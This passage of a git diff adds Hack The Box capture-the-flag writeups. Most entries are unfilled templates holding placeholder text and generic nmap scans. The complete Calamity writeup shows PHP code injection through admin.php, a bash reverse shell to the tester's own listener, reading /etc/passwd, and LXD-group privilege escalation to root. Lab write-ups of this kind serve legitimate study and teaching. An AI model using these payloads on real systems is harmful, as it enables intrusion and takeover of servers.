→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/16.md Normal file
View file

@ -0,0 +1,66 @@
# FluJab Writeup
![](img/16.png)
## Introduction :
FluJab is a hard linux box released back in January 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/17.md Normal file
View file

@ -0,0 +1,66 @@
# Helpline Writeup
![](img/17.png)
## Introduction :
Helpline is a hard windows box released back in March 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/18.md Normal file
View file

@ -0,0 +1,66 @@
# OneTwoSeven Writeup
![](img/18.png)
## Introduction :
OneTwoSeven is a hard linux box released back in April 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/19.md Normal file
View file

@ -0,0 +1,66 @@
# Ghoul Writeup
![](img/19.png)
## Introduction :
Ghoul is a hard linux box released back in may 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

499
Hard/2.md Normal file
View file

@ -0,0 +1,499 @@
# Calamity Writeup
![](img/2.png)
## Introduction :
Calamity is a hard linux box released back in June 2017.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
→ sudo nmap -vvv -sTU -p- 10.10.10.27 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Discovered open port 80/tcp on 10.10.10.27
Discovered open port 22/tcp on 10.10.10.27
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
→ nmap -sCV -p80,22 10.10.10.27
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-07 15:55 BST
Nmap scan report for 10.10.10.27
Host is up (0.029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:46:31:9c:b5:71:c5:96:91:7d:e4:63:16:f9:59:a2 (RSA)
| 256 10:c4:09:b9:48:f1:8c:45:26:ca:f6:e1:c2:dc:36:b9 (ECDSA)
|_ 256 a8:bf:dd:c0:71:36:a8:2a:1b:ea:3f:ef:66:99:39:75 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Brotherhood Software
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80 so let's investigate it:
![](prg/2/001.png)
[ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
→ gobuster dir -u http://10.10.10.27 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.27
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,php,asp,aspx,jsp,txt
[+] Timeout: 10s
===============================================================
2020/08/07 16:00:31 Starting gobuster
===============================================================
/index.md (Status: 200)
/uploads (Status: 301)
/admin.php (Status: 200)
Progress: 20842 / 220561 (9.45%)
Running gobuster we see that we have an interesting admin.php webpage:
![](prg/2/002.png)
And we get a commented line which hints us towards a password: "skoupidotenekes", so blindly we test the credentials admin:skoupidotenekes:
![](prg/2/003.png)
Now here the idea is to send GET requests to this admin.php page and test wether or not we can execute html code on it, and if we can, testing if we can execute php code (which would hopefully allow us to spawn a reverse shell).
![](prg/2/004.png)
Once the request is sent to the repeater, we change the html parameter to see if we can get anything:
![](prg/2/005.png)
And it looks like we are able to send and execute our own html code ! now let's see if we can execute php code:
<****?php echo "nihilist"; ?>
![](prg/2/006.png)
Now let's see if we can print out the phpinfo() function:
http://10.10.10.27/admin.php?html=%3C%3fphp+phpinfo()%3b+%3f%3E
![](prg/2/007.png) ![](prg/2/008.png)
It doesn't seem we can't get a reverse shell and/or execute commands so now let's try to execute commands on the machine os from our php injection:
<****?php system($_REQUEST["cmd"]); ?>
Here we request the parameter cmd, and so we add another parameter to set the cmd variable to "id" to see as which user we can execute our commands
&cmd;=id
which gives us this request:
<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=id
` ![](prg/2/009.png)
And we can execute commands as www-data! now let's get a reverse shell onto the box:
<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/9001+0>%261'
Here is our GET request:
GET /admin.php?html=<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/9001+0>%261' HTTP/1.1
Host: 10.10.10.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.27/admin.php
Connection: close
Cookie: adminpowa=noonecares
Upgrade-Insecure-Requests: 1
` ![](prg/2/010.png)
And we get a reverse shell ! However our reverse shell dies quickly which means that we probably have to do it manually without a reverse shell for now:
/admin.php?html=<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd;=cat+/etc/passwd
` ![](prg/2/011.png)
And we get the username xalvas! so let's try to read the userflag in the directory /home/xalvas/user.txt
![](prg/2/012.png)
And that's it ! we have been able to read the user flag.
## **Part 3 : Getting Root Access**
We can print out the user flag from our php code injection, but we need to get root access we need to poke around the box further:
![](prg/2/013.png)
Here we see that there is a file called recov.wav so we get it onto our box using base64 copypasting
![](prg/2/014.png)
Here we can just right click the response, and hit "copy to file"
![](prg/2/015.png)
Edit out the html part in nano, and then decode the b64 and use the "file" command utility to print out extra info about recov.wav:
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ file recov.wav.b64.req
recov.wav.b64.req: HTML document, ASCII text, with CRLF, LF line terminators
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ nano recov.wav.b64.req
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ mv recov.wav.b64.req recov.wav.b64
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ base64 -d recov.wav.b64 > recov.wavv
base64: invalid input
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ base64 -di recov.wav.b64 > recov.wav
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ file recov.wav
recov.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ audacity recov.wav
` ![](prg/2/016.png)
The audio wav file is basically a rickroll track But if we invert one of the 2 audio files in audacity, we can hear the difference in between the 2 files and it says the following
47936..* your password is 185
put back in place it says:
your password is 18547936..*
so we try to login via ssh with the credentials xalvas:18547936..*
[ 10.10.14.9/23 ] [ /dev/pts/11 ] [~]
→ ssh xalvas@10.10.10.27
The authenticity of host '10.10.10.27 (10.10.10.27)' can't be established.
ECDSA key fingerprint is SHA256:yT6ino7wgCPkMVczALjJ+BeH7VZB+It79p9HRVPEyuY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.27' (ECDSA) to the list of known hosts.
xalvas@10.10.10.27's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
9 packages can be updated.
8 updates are security updates.
Last login: Fri Jun 30 08:27:25 2017 from 10.10.13.44
xalvas@calamity:~$ id
uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
xalvas@calamity:~$
Now by typing id we saw that xalvas is part of the lxd group, and this can be compared to being in a docker group. so first of all let's get an alpine linux docker image on our machine:
xalvas@calamity:~$ id
uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
xalvas@calamity:~$ which lxc
/usr/bin/lxc
xalvas@calamity:~$ lxc --help
Usage: lxc command [options]
This is the LXD command line client.
All of LXD's features can be driven through the various commands below.
For help with any of those, simply call them with --help.
Commands:
config Change container or server configuration options
copy Copy containers within or in between LXD instances
delete Delete containers and snapshots
exec Execute commands in containers
file Manage files in containers
image Manipulate container images
info Show container or server information
launch Create and start containers from images
list List the existing containers
move Move containers within or in between LXD instances
profile Manage container configuration profiles
publish Publish containers as images
remote Manage the list of remote LXD servers
restart Restart containers
restore Restore containers from snapshots
snapshot Create container snapshots
start Start containers
stop Stop containers
version Print the version number of this client tool
Options:
--all Print less common commands
--debug Print debug information
--verbose Print verbose information
--version Show client version
Environment:
LXD_CONF Path to an alternate client configuration directory
LXD_DIR Path to an alternate server directory
The idea here is to import an Alpine Linux machine onto calamity, and to basically use lxc's image import feature to get a root shell onto the host machine:
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~]
→ sudo apt update -y
Hit:1 http://packages.microsoft.com/repos/vscode stable InRelease
Hit:2 http://archive-4.kali.org/kali kali-rolling InRelease
Reading package lists... Done
Building dependency tree
Reading state information... Done
All packages are up to date.
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~]
→ sudo apt install docker.io
Reading package lists... Done
Building dependency tree
Reading state information... Done
docker.io is already the newest version (19.03.12+dfsg1-3).
The following packages were automatically installed and are no longer required:
libmpdec2 libx264-155
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
→ ls
recov.wav recov.wav.b64 recov.wavv
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
→ mkdir lxd
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
→ cd lxd
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd]
→ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
Unpacking objects: 100% (27/27), 15.98 KiB | 287.00 KiB/s, done.
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd]
→ cd lxd-alpine-builder/
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
→ ls
build-alpine LICENSE README.md
So here we install docker and git clone the lxd-alpine builder repo from saghul
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
→ sudo su
root@nowhere:/home/nothing/_HTB/Calamity/lxd/lxd-alpine-builder# ls
build-alpine LICENSE README.md rootfs
root@nowhere:/home/nothing/_HTB/Calamity/lxd/lxd-alpine-builder# ./build-alpine -a i686
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86
Downloading alpine-keys-2.2-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.10.5-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading alpine-mirrors-3.5.10-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
Verified OK
Selecting mirror http://nl.alpinelinux.org/alpine/v3.12/main
fetch http://nl.alpinelinux.org/alpine/v3.12/main/x86/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r9)
(2/19) Installing busybox (1.31.1-r19)
Executing busybox-1.31.1-r19.post-install
(3/19) Installing alpine-baselayout (3.2.0-r7)
Executing alpine-baselayout-3.2.0-r7.pre-install
Executing alpine-baselayout-3.2.0-r7.post-install
(4/19) Installing openrc (0.42.1-r10)
Executing openrc-0.42.1-r10.post-install
(5/19) Installing alpine-conf (3.9.0-r1)
(6/19) Installing libcrypto1.1 (1.1.1g-r0)
(7/19) Installing libssl1.1 (1.1.1g-r0)
(8/19) Installing ca-certificates-bundle (20191127-r4)
(9/19) Installing libtls-standalone (2.9.1-r1)
(10/19) Installing ssl_client (1.31.1-r19)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r1)
(13/19) Installing busybox-suid (1.31.1-r19)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.6-r0)
(16/19) Installing musl-utils (1.1.24-r9)
(17/19) Installing libc-utils (0.7.2-r3)
(18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.0-r0)
Executing busybox-1.31.1-r19.trigger
OK: 8 MiB in 19 packages
Let it build for a while, then once it's done building, we can use the scp command utility to move the tar.gz file onto the host machine, into xalvas' home directory.
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
→ scp alpine-v3.12-i686-20200813_2019.tar.gz xalvas@10.10.10.27:
xalvas@10.10.10.27's password:
alpine-v3.12-i686-20200813_2019.tar.gz 100% 3135KB 535.0KB/s 00:05
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
→ ssh xalvas@10.10.10.27
xalvas@10.10.10.27's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
9 packages can be updated.
8 updates are security updates.
Last login: Thu Aug 13 12:40:34 2020 from 10.10.14.8
xalvas@calamity:~$ mkdir lxd
xalvas@calamity:~$ mv al
alarmclocks/ alpine-v3.12-i686-20200813_2019.tar.gz
xalvas@calamity:~$ mv alpine-v3.12-i686-20200813_2019.tar.gz lxd/
xalvas@calamity:~$ cd lxd/
xalvas@calamity:~/lxd$
from here, all we need to do is run the alpine image and init the container:
xalvas@calamity:~/lxd$ lxc image import alpine-v3.12-i686-20200813_2019.tar.gz --alias nothing-alpine
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04
Image imported with fingerprint: 705e08c329b2c8f7d803a5b7b943b828631ab50a5bf05cf8bd62cb4d48c150f9
xalvas@calamity:~/lxd$
xalvas@calamity:~/lxd$ lxc image list
+----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
| nothing-alpine | 705e08c329b2 | no | alpine v3.12 (20200813_20:19) | i686 | 3.06MB | Aug 13, 2020 at 6:34pm (UTC) |
+----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
xalvas@calamity:~/lxd$ lxc init nothing-alpine privesc -c security.privileged=true
Creating privesc
xalvas@calamity:~/lxd$ lxc list
+---------+---------+------+------+------------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+---------+---------+------+------+------------+-----------+
| privesc | STOPPED | | | PERSISTENT | 0 |
+---------+---------+------+------+------------+-----------+
Here we basically init our alpine container with the security.privileged flag set to true. From here we need to add the privesc config to our host-root at /mnt/root and then start the privesc config from our container onto /bin/sh in order to get a root shell From the container, BUT the main host's root (/) directory is accessible from the container's /mnt/root, which means the root flag is accessible from /mnt/root/root/root.txt inside the container itself.
xalvas@calamity:~/lxd$ lxc config device add privesc host-root disk source=/ path=/mnt/root
Device host-root added to privesc
xalvas@calamity:~/lxd$ lxc start privesc
xalvas@calamity:~/lxd$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cat /mnt/root/root/root.txt
9bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! We have been able to print out the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/2_graph.png)

66
Hard/20.md Normal file
View file

@ -0,0 +1,66 @@
# Ellingson Writeup
![](img/20.png)
## Introduction :
Ellingson is a hard linux box released back in May 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/21.md Normal file
View file

@ -0,0 +1,66 @@
# Chainsaw Writeup
![](img/21.png)
## Introduction :
Chainsaw is a hard linux box released back in June 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/22.md Normal file
View file

@ -0,0 +1,66 @@
# Player Writeup
![](img/22.png)
## Introduction :
Player is a hard linux box released back in July 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/23.md Normal file
View file

@ -0,0 +1,66 @@
# RE Writeup
![](img/23.png)
## Introduction :
RE is a hard windows box released back in July 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/24.md Normal file
View file

@ -0,0 +1,66 @@
# Scavenger Writeup
![](img/24.png)
## Introduction :
Scavenger is a hard linux box released back in August 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/25.md Normal file
View file

@ -0,0 +1,66 @@
# Zetta Writeup
![](img/25.png)
## Introduction :
Zetta is a hard linux box released back in August 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/26.md Normal file
View file

@ -0,0 +1,66 @@
# Registry Writeup
![](img/26.png)
## Introduction :
Registry is a hard linux box released back in October 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/27.md Normal file
View file

@ -0,0 +1,66 @@
# Control Writeup
![](img/27.png)
## Introduction :
Control is a hard windows box released back in November 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/28.md Normal file
View file

@ -0,0 +1,66 @@
# Patents Writeup
![](img/28.png)
## Introduction :
Patents is a hard linux box released back in January 2020.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/29.md Normal file
View file

@ -0,0 +1,66 @@
# Oouch Writeup
![](img/29.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

501
Hard/3.md Normal file
View file

@ -0,0 +1,501 @@
# Charon Writeup
![](img/3.png)
## Introduction :
Charon is a hard linux box released back in july 2017.
## **Part 1 : Initial Enumeration**
